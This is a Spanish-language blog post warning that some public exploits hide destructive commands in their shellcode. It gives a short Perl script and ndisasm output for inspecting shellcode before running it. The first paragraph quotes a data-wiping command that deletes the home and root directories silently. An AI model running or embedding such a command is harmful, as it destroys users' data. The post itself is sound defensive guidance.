Leyendo esta entrada publicada por los de Securiteam me ha hecho recordar la cantidad de cabroncetes que hay sueltos por ahí y la manía que tienen por incluir instrucciones como rm -rf ~ /* 2> /dev/null & en la shellcode utilizada para explotar una vulnerabilidad y de paso inutilizarte el equipo.
En el caso que comenta xyberpix, al ejecutar el exploit, junto a este se lanzaba de paso un borrado contra el directorio home del usuario para pasar luego al directorio raíz, y mandar cualquier error de la salida al directorio /dev/null, de forma que el proceso fuese transparente al usuario.
Todo esto me hace recordar que nunca es bueno fiarse de los exploits que encontramos por la red, y que siempre viene bien saber qué hace exactamente la shellcode que queremos lanzar, así que como más vale prevenir que curar, he hecho un pequeño script en perl para que desensamble una shellcode y nos muestre los opcodes y se puedan leer con un poco más de facilidad.
En un nuevo fichero escribimos:
#!/usr/bin/perl -w
$shellcode = "AQUÍ VA NUESTRA SHELLCODE";
open(FILE, ">shellcode.bin");
print FILE "$shellcode";
close(FILE);
Lo ejecutamos con:
sebas@Penetraitor:~/roote/lab-sec$ perl proof.pl
Y por último hacemos que nos muestre el resultado por pantalla:
sebas@Penetraitor:~/roote/lab-sec$ ndisasm -b 32 shellcode.bin
00000000 2321 and esp,[ecx]
00000002 2F das
00000003 7573 jnz 0x78
00000005 722F jc 0x36
00000007 62696E bound ebp,[ecx+0x6e]
0000000A 2F das
0000000B 7065 jo 0x72
0000000D 726C jc 0x7b
[...]
También existen otras alternativas como Pym's, que nos permite desensamblar una shell de forma online.
0 comentarios:
Publicar un comentario